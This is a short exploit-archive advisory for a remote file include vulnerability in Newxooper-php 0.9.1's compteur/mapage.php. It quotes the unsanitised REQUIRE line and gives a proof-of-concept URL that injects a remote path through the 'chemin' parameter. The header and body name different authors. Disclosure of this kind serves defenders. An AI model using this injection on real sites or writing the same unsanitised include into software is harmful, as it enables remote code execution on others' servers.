id: 1282
date: 12/21/2006
title: Newxooper-php 0.9.1 (mapage.php) Remote File Include Vulnerability
author: 3l3ctric-Cracker
cves: 

==================================================================
Newxooper-php 0.9.1 (mapage.php) Remote File Include Vulnerability
==================================================================




###########################################################################################
#Newxooper-php v0.9.1(chemin) Remote File Include Vulnerabilty #
###########################################################################################
#Author:Dr Max Virus #
#Location:Egypt #
###########################################################################################
#Bug in compteur/mapage.php #
#In Line:37 #
#Vul Code: #
#REQUIRE ("$chemin/compteur/mapage.txt"); #
###########################################################################################
#POC: #
#http://[target]/[path]/compteur/mapage.php?chemin=Evil Code #
###########################################################################################
#Thx:str0ke & ajann &All friends #
#Special Gr33ts:AsianEagle & The master & Kacper & Hotturk #
###########################################################################################




#  0day.today [2023-03-22]  #